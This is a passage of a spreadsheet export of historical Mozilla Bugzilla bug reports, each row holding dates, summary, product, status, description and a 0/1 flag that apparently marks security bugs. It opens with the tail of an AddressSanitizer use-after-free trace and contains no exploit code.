    #45 0x7fdad2d96d26 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:535
    #46 0x7fdad2d96d26 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:664
    #47 0x7fdad3d008c0 in SetExistingProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyResult&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2765:10
    #48 0x7fdad3cf91d6 in bool js::NativeSetProperty&lt;(js::QualifiedBool)1&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2793:20
    #49 0x7fdad2d74a59 in SetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1646:12
    #50 0x7fdad2d74a59 in SetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:264
    #51 0x7fdad2d74a59 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2882
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:2426:19 in nsIFrame::GetClipPropClipRect(nsStyleDisplay const*, nsStyleEffects const*, nsSize const&amp;) const
Shadow bytes around the buggy address:
  0x0c0880014f80: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa
  0x0c0880014f90: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
  0x0c0880014fa0: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
  0x0c0880014fb0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa
  0x0c0880014fc0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00
=&gt;0x0c0880014fd0: fa fa fd fd fd fd fd[fd]fa fa fd fd fd fd fd fd
  0x0c0880014fe0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa
  0x0c0880014ff0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c0880015000: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c0880015010: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c0880015020: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd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5408==ABORTING</t>
        </is>
      </c>
      <c r="X1825" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1826">
      <c r="A1826" t="n">
        <v>1272388</v>
      </c>
      <c r="B1826" t="inlineStr">
        <is>
          <t>2016-05-12 09:05:55 -0700</t>
        </is>
      </c>
      <c r="C1826" t="inlineStr">
        <is>
          <t>Allow databricks clusters to access the tiles redshift database</t>
        </is>
      </c>
      <c r="D1826" t="inlineStr">
        <is>
          <t>2023-01-19 18:53:51 -0800</t>
        </is>
      </c>
      <c r="E1826" t="n">
        <v>1</v>
      </c>
      <c r="F1826" t="n">
        <v>1</v>
      </c>
      <c r="G1826" t="n">
        <v>6</v>
      </c>
      <c r="H1826" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1826" t="inlineStr">
        <is>
          <t>Data Platform and Tools Graveyard</t>
        </is>
      </c>
      <c r="J1826" t="inlineStr">
        <is>
          <t>Operations</t>
        </is>
      </c>
      <c r="K1826" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1826" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1826" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1826" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1826" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1826" t="inlineStr">
        <is>
          <t>[DataOps]</t>
        </is>
      </c>
      <c r="Q1826" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1826" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1826" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1826" t="n">
        <v>1</v>
      </c>
      <c r="U1826" t="n">
        <v>0</v>
      </c>
      <c r="V1826" t="n">
        <v>29</v>
      </c>
      <c r="W1826" t="inlineStr">
        <is>
          <t>This includes setting up a JDBC driver and perhaps installing this library: https://github.com/databricks/spark-redshift</t>
        </is>
      </c>
      <c r="X1826" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1827">
      <c r="A1827" t="n">
        <v>638154</v>
      </c>
      <c r="B1827" t="inlineStr">
        <is>
          <t>2011-03-02 10:55:08 -0800</t>
        </is>
      </c>
      <c r="C1827" t="inlineStr">
        <is>
          <t>new l10n scripts need to set MOZ_PKG_VERSION</t>
        </is>
      </c>
      <c r="D1827" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1827" t="n">
        <v>1</v>
      </c>
      <c r="F1827" t="n">
        <v>1</v>
      </c>
      <c r="G1827" t="n">
        <v>5</v>
      </c>
      <c r="H1827" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1827" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1827" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1827" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1827" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1827" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1827" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1827" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1827" t="inlineStr"/>
      <c r="Q1827" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1827" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1827" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1827" t="n">
        <v>1</v>
      </c>
      <c r="U1827" t="n">
        <v>0</v>
      </c>
      <c r="V1827" t="n">
        <v>4</v>
      </c>
      <c r="W1827" t="inlineStr">
        <is>
          <t>Necessary for RCs, where the in-app version differs from what we want to call the files.</t>
        </is>
      </c>
      <c r="X1827" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1828">
      <c r="A1828" t="n">
        <v>1438815</v>
      </c>
      <c r="B1828" t="inlineStr">
        <is>
          <t>2018-02-16 04:36:22 -0800</t>
        </is>
      </c>
      <c r="C1828" t="inlineStr">
        <is>
          <t>The drop-down menu from firefox toolbar stays open after the install of a sideload add-on</t>
        </is>
      </c>
      <c r="D1828" t="inlineStr">
        <is>
          <t>2019-03-31 02:21:14 -0700</t>
        </is>
      </c>
      <c r="E1828" t="n">
        <v>1</v>
      </c>
      <c r="F1828" t="n">
        <v>1</v>
      </c>
      <c r="G1828" t="n">
        <v>2</v>
      </c>
      <c r="H1828" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1828" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1828" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K1828" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L1828" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1828" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1828" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1828" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1828" t="inlineStr"/>
      <c r="Q1828" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1828" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1828" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T1828" t="n">
        <v>1</v>
      </c>
      <c r="U1828" t="n">
        <v>0</v>
      </c>
      <c r="V1828" t="n">
        <v>9</v>
      </c>
      <c r="W1828" t="inlineStr">
        <is>
          <t>Created attachment 8951567
OpenMenu.gif
[Affected versions]:
- Firefox 60.0a1 (20180215220507)
[Affected platforms]:
- Win 10 64-bit
- Mac OS X 10.13.2
[Steps to reproduce]:
1.Install an add-on via the sideload method. 
2.Click on the hamburger menu.
3.Click on the add-on.
[Expected results]:
- The add-ons confirmation pop-up is displayed and the drop-down menu is closed.
[Actual results]:
- The add-ons confirmation pop-up is displayed and the drop-down menu at the same time.
- The drop-down menu is closed only if you click outside of it.
[Regression range]
Last good revision: da28225092290da176113e25ec85fb0aca0f04e9 
First bad revision: 663987f8bdd98a67581f76956cc7051ea94c460a     
Pushlog: https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=da28225092290da176113e25ec85fb0aca0f04e9&amp;tochange=663987f8bdd98a67581f76956cc7051ea94c460a</t>
        </is>
      </c>
      <c r="X1828" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1829">
      <c r="A1829" t="n">
        <v>510770</v>
      </c>
      <c r="B1829" t="inlineStr">
        <is>
          <t>2009-08-16 04:57:39 -0700</t>
        </is>
      </c>
      <c r="C1829" t="inlineStr">
        <is>
          <t>Use 'make source-package' in release source factories</t>
        </is>
      </c>
      <c r="D1829" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1829" t="n">
        <v>1</v>
      </c>
      <c r="F1829" t="n">
        <v>1</v>
      </c>
      <c r="G1829" t="n">
        <v>5</v>
      </c>
      <c r="H1829" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1829" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1829" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1829" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1829" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1829" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1829" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1829" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1829" t="inlineStr">
        <is>
          <t>[automation][simple][oldbugs]</t>
        </is>
      </c>
      <c r="Q1829" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1829" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1829" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1829" t="n">
        <v>1</v>
      </c>
      <c r="U1829" t="n">
        <v>0</v>
      </c>
      <c r="V1829" t="n">
        <v>67</v>
      </c>
      <c r="W1829" t="inlineStr">
        <is>
          <t>As mentioned once again in bug 508243 comment #2, we should probably use 'make source-package', introduced in bug 456373, for our source factories in the release harness.</t>
        </is>
      </c>
      <c r="X1829" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1830">
      <c r="A1830" t="n">
        <v>1160884</v>
      </c>
      <c r="B1830" t="inlineStr">
        <is>
          <t>2015-05-03 09:56:08 -0700</t>
        </is>
      </c>
      <c r="C1830" t="inlineStr">
        <is>
          <t>Crash [@ js::str_split_string(JSContext*, JS::Handle&lt;js::ObjectGroup*&gt;, JS::Handle&lt;JSString*&gt;, JS::Handle&lt;JSString*&gt;) ]</t>
        </is>
      </c>
      <c r="D1830" t="inlineStr">
        <is>
          <t>2016-07-02 10:44:48 -0700</t>
        </is>
      </c>
      <c r="E1830" t="n">
        <v>1</v>
      </c>
      <c r="F1830" t="n">
        <v>1</v>
      </c>
      <c r="G1830" t="n">
        <v>3</v>
      </c>
      <c r="H1830" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1830" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1830" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1830" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1830" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1830" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1830" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1830" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1830" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr31.8+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q1830" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1830" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1830" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T1830" t="n">
        <v>1</v>
      </c>
      <c r="U1830" t="n">
        <v>0</v>
      </c>
      <c r="V1830" t="n">
        <v>49</v>
      </c>
      <c r="W1830" t="inlineStr">
        <is>
          <t>Created attachment 8600705
Nightly Crash report - Assertion failure: addr % CellSize == 0
1. http://www.centenario1914-1918.it/it
2. This is not reliable. You may need to reload several times.
3. Crash on Windows only so far.
bp-47d0057a-57bc-4292-8a38-58d5d2150503
exploitability: high
Also crashes debug on Beta/38, Nightly/40</t>
        </is>
      </c>
      <c r="X1830" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1831">
      <c r="A1831" t="n">
        <v>531222</v>
      </c>
      <c r="B1831" t="inlineStr">
        <is>
          <t>2009-11-25 20:00:28 -0800</t>
        </is>
      </c>
      <c r="C1831" t="inlineStr">
        <is>
          <t>Using SSM off main thread</t>
        </is>
      </c>
      <c r="D1831" t="inlineStr">
        <is>
          <t>2010-06-20 10:08:03 -0700</t>
        </is>
      </c>
      <c r="E1831" t="n">
        <v>1</v>
      </c>
      <c r="F1831" t="n">
        <v>1</v>
      </c>
      <c r="G1831" t="n">
        <v>3</v>
      </c>
      <c r="H1831" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1831" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1831" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1831" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1831" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1831" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1831" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1831" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1831" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1831" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1831" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1831" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1831" t="n">
        <v>1</v>
      </c>
      <c r="U1831" t="n">
        <v>0</v>
      </c>
      <c r="V1831" t="n">
        <v>22</v>
      </c>
      <c r="W1831" t="inlineStr">
        <is>
          <t>Created attachment 414676
Stack
See attached stack.</t>
        </is>
      </c>
      <c r="X1831" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1832">
      <c r="A1832" t="n">
        <v>55253</v>
      </c>
      <c r="B1832" t="inlineStr">
        <is>
          <t>2000-10-04 17:29:03 -0700</t>
        </is>
      </c>
      <c r="C1832" t="inlineStr">
        <is>
          <t>Browser cannot launch after update.html from Win 9x only</t>
        </is>
      </c>
      <c r="D1832" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E1832" t="n">
        <v>1</v>
      </c>
      <c r="F1832" t="n">
        <v>1</v>
      </c>
      <c r="G1832" t="n">
        <v>6</v>
      </c>
      <c r="H1832" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1832" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1832" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K1832" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1832" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1832" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N1832" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1832" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1832" t="inlineStr">
        <is>
          <t>[rtm++]</t>
        </is>
      </c>
      <c r="Q1832" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1832" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1832" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1832" t="n">
        <v>1</v>
      </c>
      <c r="U1832" t="n">
        <v>0</v>
      </c>
      <c r="V1832" t="n">
        <v>28</v>
      </c>
      <c r="W1832" t="inlineStr">
        <is>
          <t>Build: 2000-10-04-09-MN6(WIN)
1. Open 
ftp://sweetlou/products/client/seamonkey/windows/32bit/x86/2000-10-04-09-MN6/upd
ate.html and click Launch XPInstall button
2. After Successful update, reboot machine to allow file replacement of files
   in use
3. Launch Seamonkey
4. If Profile Manager appears, choose one and start browser
RESULT:
Browser does not start up.  Checking Chrome directory reveals that some jar 
files are not replaced.  It appears that those with names greater than 8 
characters failed.
EXPECTED RESULT:
Browser starts up gracefully.</t>
        </is>
      </c>
      <c r="X1832" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1833">
      <c r="A1833" t="n">
        <v>1390864</v>
      </c>
      <c r="B1833" t="inlineStr">
        <is>
          <t>2017-08-16 06:21:35 -0700</t>
        </is>
      </c>
      <c r="C1833" t="inlineStr">
        <is>
          <t>saving items to pocket from the new tab page does not work</t>
        </is>
      </c>
      <c r="D1833" t="inlineStr">
        <is>
          <t>2017-10-03 15:40:49 -0700</t>
        </is>
      </c>
      <c r="E1833" t="n">
        <v>1</v>
      </c>
      <c r="F1833" t="n">
        <v>1</v>
      </c>
      <c r="G1833" t="n">
        <v>2</v>
      </c>
      <c r="H1833" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1833" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1833" t="inlineStr">
        <is>
          <t>Pocket</t>
        </is>
      </c>
      <c r="K1833" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1833" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1833" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1833" t="inlineStr">
        <is>
          <t>[fixed by bug 1385418]</t>
        </is>
      </c>
      <c r="Q1833" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1833" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1833" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1833" t="n">
        <v>1</v>
      </c>
      <c r="U1833" t="n">
        <v>0</v>
      </c>
      <c r="V1833" t="n">
        <v>5</v>
      </c>
      <c r="W1833" t="inlineStr">
        <is>
          <t>STR:
1. Open a new tab.
2. Hover over an interesting "Recommended by Pocket" item.
3. Click on the ellipsis menu in the upper right hand corner of the item.
4. Choose "Save to Pocket".
Expected results:
Item is saved to Pocket.
Actual results:
Item is not saved to Pocket.
Saving things from the button in the URL bar works, and such items show up very quickly on my mobile device, so I don't think it's a problem with the remote side of things.</t>
        </is>
      </c>
      <c r="X1833" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1834">
      <c r="A1834" t="n">
        <v>621107</v>
      </c>
      <c r="B1834" t="inlineStr">
        <is>
          <t>2010-12-22 23:23:43 -0800</t>
        </is>
      </c>
      <c r="C1834" t="inlineStr">
        <is>
          <t>[SECURITY] Sanity checking lacks CSRF protection</t>
        </is>
      </c>
      <c r="D1834" t="inlineStr">
        <is>
          <t>2013-01-28 10:07:57 -0800</t>
        </is>
      </c>
      <c r="E1834" t="n">
        <v>1</v>
      </c>
      <c r="F1834" t="n">
        <v>1</v>
      </c>
      <c r="G1834" t="n">
        <v>4</v>
      </c>
      <c r="H1834" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1834" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1834" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K1834" t="inlineStr">
        <is>
          <t>3.6.3</t>
        </is>
      </c>
      <c r="L1834" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1834" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1834" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1834" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1834" t="inlineStr">
        <is>
          <t>[infrasec:csrf][ws:low]</t>
        </is>
      </c>
      <c r="Q1834" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1834" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S1834" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T1834" t="n">
        <v>1</v>
      </c>
      <c r="U1834" t="n">
        <v>0</v>
      </c>
      <c r="V1834" t="n">
        <v>32</v>
      </c>
      <c r="W1834" t="inlineStr">
        <is>
          <t>sanitycheck.cgi has no CSRF protection. Should display an intermediary page asking the user if he/she wants to sanity check (including a token). Command-line shouldn't require the token.</t>
        </is>
      </c>
      <c r="X1834" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1835">
      <c r="A1835" t="n">
        <v>1493687</v>
      </c>
      <c r="B1835" t="inlineStr">
        <is>
          <t>2018-09-24 07:47:32 -0700</t>
        </is>
      </c>
      <c r="C1835" t="inlineStr">
        <is>
          <t>rewrite crontabber using django models and commands</t>
        </is>
      </c>
      <c r="D1835" t="inlineStr">
        <is>
          <t>2019-04-11 06:19:04 -0700</t>
        </is>
      </c>
      <c r="E1835" t="n">
        <v>1</v>
      </c>
      <c r="F1835" t="n">
        <v>1</v>
      </c>
      <c r="G1835" t="n">
        <v>4</v>
      </c>
      <c r="H1835" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1835" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1835" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K1835" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1835" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1835" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1835" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1835" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1835" t="inlineStr"/>
      <c r="Q1835" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1835" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1835" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1835" t="n">
        <v>1</v>
      </c>
      <c r="U1835" t="n">
        <v>0</v>
      </c>
      <c r="V1835" t="n">
        <v>23</v>
      </c>
      <c r="W1835" t="inlineStr">
        <is>
          <t>In bug #1478080, I pulled the code for the crontabber library (which itself was extracted out of Socorro years ago) back into Socorro. The next step for that is to convert it into a Django app.
Converting it into a Django app involves some or all of the following:
1. building Django models for the crontabber and crontabber_log tables
2. adding a django admin view for those tables
3. writing Django commands for the crontabber subcommands
4. reworking the existing crontabber jobs to work in this new context
This bug covers that work.</t>
        </is>
      </c>
      <c r="X1835" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1836">
      <c r="A1836" t="n">
        <v>102622</v>
      </c>
      <c r="B1836" t="inlineStr">
        <is>
          <t>2001-10-01 16:46:22 -0700</t>
        </is>
      </c>
      <c r="C1836" t="inlineStr">
        <is>
          <t>Dependency graphs should be able to be limited by relationship</t>
        </is>
      </c>
      <c r="D1836" t="inlineStr">
        <is>
          <t>2011-08-05 22:30:02 -0700</t>
        </is>
      </c>
      <c r="E1836" t="n">
        <v>1</v>
      </c>
      <c r="F1836" t="n">
        <v>1</v>
      </c>
      <c r="G1836" t="n">
        <v>4</v>
      </c>
      <c r="H1836" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1836" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1836" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1836" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L1836" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1836" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1836" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1836" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1836" t="inlineStr">
        <is>
          <t>[applied to b.m.o]</t>
        </is>
      </c>
      <c r="Q1836" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1836" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1836" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T1836" t="n">
        <v>1</v>
      </c>
      <c r="U1836" t="n">
        <v>3</v>
      </c>
      <c r="V1836" t="n">
        <v>27</v>
      </c>
      <c r="W1836" t="inlineStr">
        <is>
          <t>showdependencygraph.cgi creates graphs containing any bug with any relationship
to the bug whose graph is being requested.  In some cases this means that
Bugzilla generates a webdot file with thousands of dependencies, which is too
many for webdot to parse, so showdependencygraph.cgi returns a page that hangs
for five minutes and then times out waiting for the graph image to be displayed.
showdependencygraph.cgi should provide options for limiting the level of
recursion or other mechanisms to make it usable with bugs that have a large
number of dependencies.  It could use the same logic used by showdependencytree.cgi
 to limit the number of bugs it displays.</t>
        </is>
      </c>
      <c r="X1836" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1837">
      <c r="A1837" t="n">
        <v>539258</v>
      </c>
      <c r="B1837" t="inlineStr">
        <is>
          <t>2010-01-12 09:49:48 -0800</t>
        </is>
      </c>
      <c r="C1837" t="inlineStr">
        <is>
          <t>[dashboard][shipping] Remove dummy test results in pushes view</t>
        </is>
      </c>
      <c r="D1837" t="inlineStr">
        <is>
          <t>2010-01-13 08:11:01 -0800</t>
        </is>
      </c>
      <c r="E1837" t="n">
        <v>1</v>
      </c>
      <c r="F1837" t="n">
        <v>1</v>
      </c>
      <c r="G1837" t="n">
        <v>2</v>
      </c>
      <c r="H1837" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1837" t="inlineStr">
        <is>
          <t>Mozilla Localizations</t>
        </is>
      </c>
      <c r="J1837" t="inlineStr">
        <is>
          <t>Infrastructure</t>
        </is>
      </c>
      <c r="K1837" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1837" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1837" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1837" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1837" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1837" t="inlineStr"/>
      <c r="Q1837" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1837" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1837" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1837" t="n">
        <v>1</v>
      </c>
      <c r="U1837" t="n">
        <v>0</v>
      </c>
      <c r="V1837" t="n">
        <v>2</v>
      </c>
      <c r="W1837" t="inlineStr">
        <is>
          <t>We're still having dummy test results in the pushes view in the shipping app.
That's just confusing localizers, and we should get rid of it.
IMHO, before we make signoff live, so P1.</t>
        </is>
      </c>
      <c r="X1837" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1838">
      <c r="A1838" t="n">
